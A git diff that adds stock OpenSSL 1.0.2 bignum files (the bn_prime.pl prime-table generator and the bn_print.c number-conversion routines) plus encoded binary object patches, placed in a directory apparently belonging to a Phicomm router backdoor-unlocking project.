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

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_prime.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_prime.pl
new file mode 100644
index 0000000..3fafb6f
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_prime.pl
@@ -0,0 +1,119 @@
+#!/usr/local/bin/perl
+# bn_prime.pl
+
+$num=2048;
+$num=$ARGV[0] if ($#ARGV >= 0);
+
+push(@primes,2);
+$p=1;
+loop: while ($#primes < $num-1)
+	{
+	$p+=2;
+	$s=int(sqrt($p));
+
+	for ($i=0; defined($primes[$i]) && $primes[$i]<=$s; $i++)
+		{
+		next loop if (($p%$primes[$i]) == 0);
+		}
+	push(@primes,$p);
+	}
+
+# print <<"EOF";
+# /* Auto generated by bn_prime.pl */
+# /* Copyright (C) 1995-1997 Eric Young (eay\@mincom.oz.au).
+#  * All rights reserved.
+#  * Copyright remains Eric Young's, and as such any Copyright notices in
+#  * the code are not to be removed.
+#  * See the COPYRIGHT file in the SSLeay distribution for more details.
+#  */
+# 
+# EOF
+
+print <<\EOF;
+/* Auto generated by bn_prime.pl */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ * 
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ * 
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ * 
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from 
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ * 
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ * 
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+EOF
+
+for ($i=0; $i <= $#primes; $i++)
+	{
+	if ($primes[$i] > 256)
+		{
+		$eight=$i;
+		last;
+		}
+	}
+
+printf "#ifndef EIGHT_BIT\n";
+printf "#define NUMPRIMES %d\n",$num;
+printf "typedef unsigned short prime_t;\n";
+printf "#else\n";
+printf "#define NUMPRIMES %d\n",$eight;
+printf "typedef unsigned char prime_t;\n";
+printf "#endif\n";
+print "static const prime_t primes[NUMPRIMES]=\n\t{\n\t";
+$init=0;
+for ($i=0; $i <= $#primes; $i++)
+	{
+	printf "\n#ifndef EIGHT_BIT\n\t" if ($primes[$i] > 256) && !($init++);
+	printf("\n\t") if (($i%8) == 0) && ($i != 0);
+	printf("%4d,",$primes[$i]);
+	}
+print "\n#endif\n\t};\n";
+
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_print.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_print.c
new file mode 100644
index 0000000..4dcaae3
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_print.c
@@ -0,0 +1,383 @@
+/* crypto/bn/bn_print.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include <ctype.h>
+#include "cryptlib.h"
+#include <openssl/buffer.h>
+#include "bn_lcl.h"
+
+static const char Hex[] = "0123456789ABCDEF";
+
+/* Must 'OPENSSL_free' the returned data */
+char *BN_bn2hex(const BIGNUM *a)
+{
+    int i, j, v, z = 0;
+    char *buf;
+    char *p;
+
+    buf = (char *)OPENSSL_malloc(a->top * BN_BYTES * 2 + 2);
+    if (buf == NULL) {
+        BNerr(BN_F_BN_BN2HEX, ERR_R_MALLOC_FAILURE);
+        goto err;
+    }
+    p = buf;
+    if (a->neg)
+        *(p++) = '-';
+    if (BN_is_zero(a))
+        *(p++) = '0';
+    for (i = a->top - 1; i >= 0; i--) {
+        for (j = BN_BITS2 - 8; j >= 0; j -= 8) {
+            /* strip leading zeros */
+            v = ((int)(a->d[i] >> (long)j)) & 0xff;
+            if (z || (v != 0)) {
+                *(p++) = Hex[v >> 4];
+                *(p++) = Hex[v & 0x0f];
+                z = 1;
+            }
+        }
+    }
+    *p = '\0';
+ err:
+    return (buf);
+}
+
+/* Must 'OPENSSL_free' the returned data */
+char *BN_bn2dec(const BIGNUM *a)
+{
+    int i = 0, num, ok = 0;
+    char *buf = NULL;
+    char *p;
+    BIGNUM *t = NULL;
+    BN_ULONG *bn_data = NULL, *lp;
+
+    /*-
+     * get an upper bound for the length of the decimal integer
+     * num <= (BN_num_bits(a) + 1) * log(2)
+     *     <= 3 * BN_num_bits(a) * 0.1001 + log(2) + 1     (rounding error)
+     *     <= BN_num_bits(a)/10 + BN_num_bits/1000 + 1 + 1
+     */
+    i = BN_num_bits(a) * 3;
+    num = (i / 10 + i / 1000 + 1) + 1;
+    bn_data =
+        (BN_ULONG *)OPENSSL_malloc((num / BN_DEC_NUM + 1) * sizeof(BN_ULONG));
+    buf = (char *)OPENSSL_malloc(num + 3);
+    if ((buf == NULL) || (bn_data == NULL)) {
+        BNerr(BN_F_BN_BN2DEC, ERR_R_MALLOC_FAILURE);
+        goto err;
+    }
+    if ((t = BN_dup(a)) == NULL)
+        goto err;
+
+#define BUF_REMAIN (num+3 - (size_t)(p - buf))
+    p = buf;
+    lp = bn_data;
+    if (BN_is_zero(t)) {
+        *(p++) = '0';
+        *(p++) = '\0';
+    } else {
+        if (BN_is_negative(t))
+            *p++ = '-';
+
+        i = 0;
+        while (!BN_is_zero(t)) {
+            *lp = BN_div_word(t, BN_DEC_CONV);
+            lp++;
+        }
+        lp--;
+        /*
+         * We now have a series of blocks, BN_DEC_NUM chars in length, where
+         * the last one needs truncation. The blocks need to be reversed in
+         * order.
+         */
+        BIO_snprintf(p, BUF_REMAIN, BN_DEC_FMT1, *lp);
+        while (*p)
+            p++;
+        while (lp != bn_data) {
+            lp--;
+            BIO_snprintf(p, BUF_REMAIN, BN_DEC_FMT2, *lp);
+            while (*p)
+                p++;
+        }
+    }
+    ok = 1;
+ err:
+    if (bn_data != NULL)
+        OPENSSL_free(bn_data);
+    if (t != NULL)
+        BN_free(t);
+    if (!ok && buf) {
+        OPENSSL_free(buf);
+        buf = NULL;
+    }
+
+    return (buf);
+}
+
+int BN_hex2bn(BIGNUM **bn, const char *a)
+{
+    BIGNUM *ret = NULL;
+    BN_ULONG l = 0;
+    int neg = 0, h, m, i, j, k, c;
+    int num;
+
+    if ((a == NULL) || (*a == '\0'))
+        return (0);
+
+    if (*a == '-') {
+        neg = 1;
+        a++;
+    }
+
+    for (i = 0; isxdigit((unsigned char)a[i]); i++) ;
+
+    num = i + neg;
+    if (bn == NULL)
+        return (num);
+
+    /* a is the start of the hex digits, and it is 'i' long */
+    if (*bn == NULL) {
+        if ((ret = BN_new()) == NULL)
+            return (0);
+    } else {
+        ret = *bn;
+        BN_zero(ret);
+    }
+
+    /* i is the number of hex digests; */
+    if (bn_expand(ret, i * 4) == NULL)
+        goto err;
+
+    j = i;                      /* least significant 'hex' */
+    m = 0;
+    h = 0;
+    while (j > 0) {
+        m = ((BN_BYTES * 2) <= j) ? (BN_BYTES * 2) : j;
+        l = 0;
+        for (;;) {
+            c = a[j - m];
+            if ((c >= '0') && (c <= '9'))
+                k = c - '0';
+            else if ((c >= 'a') && (c <= 'f'))
+                k = c - 'a' + 10;
+            else if ((c >= 'A') && (c <= 'F'))
+                k = c - 'A' + 10;
+            else
+                k = 0;          /* paranoia */
+            l = (l << 4) | k;
+
+            if (--m <= 0) {
+                ret->d[h++] = l;
+                break;
+            }
+        }
+        j -= (BN_BYTES * 2);
+    }
+    ret->top = h;
+    bn_correct_top(ret);
+    ret->neg = neg;
+
+    *bn = ret;
+    bn_check_top(ret);
+    return (num);
+ err:
+    if (*bn == NULL)
+        BN_free(ret);
+    return (0);
+}
+
+int BN_dec2bn(BIGNUM **bn, const char *a)
+{
+    BIGNUM *ret = NULL;
+    BN_ULONG l = 0;
+    int neg = 0, i, j;
+    int num;
+
+    if ((a == NULL) || (*a == '\0'))
+        return (0);
+    if (*a == '-') {
+        neg = 1;
+        a++;
+    }
+
+    for (i = 0; isdigit((unsigned char)a[i]); i++) ;
+
+    num = i + neg;
+    if (bn == NULL)
+        return (num);
+
+    /*
+     * a is the start of the digits, and it is 'i' long. We chop it into
+     * BN_DEC_NUM digits at a time
+     */
+    if (*bn == NULL) {
+        if ((ret = BN_new()) == NULL)
+            return (0);
+    } else {
+        ret = *bn;
+        BN_zero(ret);
+    }
+
+    /* i is the number of digests, a bit of an over expand; */
+    if (bn_expand(ret, i * 4) == NULL)
+        goto err;
+
+    j = BN_DEC_NUM - (i % BN_DEC_NUM);
+    if (j == BN_DEC_NUM)
+        j = 0;
+    l = 0;
+    while (*a) {
+        l *= 10;
+        l += *a - '0';
+        a++;
+        if (++j == BN_DEC_NUM) {
+            BN_mul_word(ret, BN_DEC_CONV);
+            BN_add_word(ret, l);
+            l = 0;
+            j = 0;
+        }
+    }
+    ret->neg = neg;
+
+    bn_correct_top(ret);
+    *bn = ret;
+    bn_check_top(ret);
+    return (num);
+ err:
+    if (*bn == NULL)
+        BN_free(ret);
+    return (0);
+}
+
+int BN_asc2bn(BIGNUM **bn, const char *a)
+{
+    const char *p = a;
+    if (*p == '-')
+        p++;
+
+    if (p[0] == '0' && (p[1] == 'X' || p[1] == 'x')) {
+        if (!BN_hex2bn(bn, p + 2))
+            return 0;
+    } else {
+        if (!BN_dec2bn(bn, p))
+            return 0;
+    }
+    if (*a == '-')
+        (*bn)->neg = 1;
+    return 1;
+}
+
+#ifndef OPENSSL_NO_BIO
+# ifndef OPENSSL_NO_FP_API
+int BN_print_fp(FILE *fp, const BIGNUM *a)
+{
+    BIO *b;
+    int ret;
+
+    if ((b = BIO_new(BIO_s_file())) == NULL)
+        return (0);
+    BIO_set_fp(b, fp, BIO_NOCLOSE);
+    ret = BN_print(b, a);
+    BIO_free(b);
+    return (ret);
+}
+# endif
+
+int BN_print(BIO *bp, const BIGNUM *a)
+{
+    int i, j, v, z = 0;
+    int ret = 0;
+
+    if ((a->neg) && (BIO_write(bp, "-", 1) != 1))
+        goto end;
+    if (BN_is_zero(a) && (BIO_write(bp, "0", 1) != 1))
+        goto end;
+    for (i = a->top - 1; i >= 0; i--) {
+        for (j = BN_BITS2 - 4; j >= 0; j -= 4) {
+            /* strip leading zeros */
+            v = ((int)(a->d[i] >> (long)j)) & 0x0f;
+            if (z || (v != 0)) {
+                if (BIO_write(bp, &(Hex[v]), 1) != 1)
+                    goto end;
+                z = 1;
+            }
+        }
+    }
+    ret = 1;
+ end:
+    return (ret);
+}
+#endif
+
+char *BN_options(void)
+{
+    static int init = 0;
+    static char data[16];
+
+    if (!init) {
+        init++;
+#ifdef BN_LLONG
+        BIO_snprintf(data, sizeof data, "bn(%d,%d)",
+                     (int)sizeof(BN_ULLONG) * 8, (int)sizeof(BN_ULONG) * 8);
+#else
+        BIO_snprintf(data, sizeof data, "bn(%d,%d)",
+                     (int)sizeof(BN_ULONG) * 8, (int)sizeof(BN_ULONG) * 8);
+#endif
+    }
+    return (data);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_print.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_print.o
new file mode 100644
index 0000000000000000000000000000000000000000..c45a10f5b0ef58cba7acdc822f674af16d9e3a27
GIT binary patch
literal 6608
zcmbtZeQcY>89#rdbs)1%%ST3`3y@TaXpEhvC55cyb?o%qIq3&U*~*7W9G7M!PUO6A
z6JSj%y>->M#tcpSgK9|Iv_Gav+aE{>Xc4K?k0kBbRLUkm1yQ<+HkdT9LYhLU_dMsj
z^ztfZlXjBdyZ3j$=i{Ecd+y$3XE5AkwOEKK7P5w1e-kJn?pv?78(6b}xQLTnaxMKv
zX+5|OAevr@9S>9E+l{H6j*;_reaw0Rp^$NuCNtX7pfBS)eoz5qxC<VKZ17-&i9OKL
zpK}vx999>Ol4_dXV9}p*5N*Mz)k|}SQ;m+G?|3+U3-Cy~FBguEhDOfVlGB6qKpj9d
zWm}i3C-mK^2G?t2O7VzVHZo(^&%3C8*s2`B5z&{FeRk_!|23!{*z3>f6At~#jCL&d
z_mF<Uk$rX4$_5iQ&TM&9dF%)q*dxkjrA=vVqsDg+Q~mQ&=Irnd=tD_^F~0xuwc!ge
z2*o&Nj2~DGFd#e(ishJ+4q6rcSkeB=R}OARnfhZ6sF;$21JL5sfH4&^Mj4!slv>oB
zoYtzPaBTxN3zzRS<3Yb`_cVaMN#E&-_feNI#d@f53}UUG*9RebC0ms-d%2fPyaEh;
z&`rX|ztkI)QG0oHDE(NuC3FbfG3@t@?F$?K)^|9Fx-@KD169;$EqCPgrJzL(D+JP!
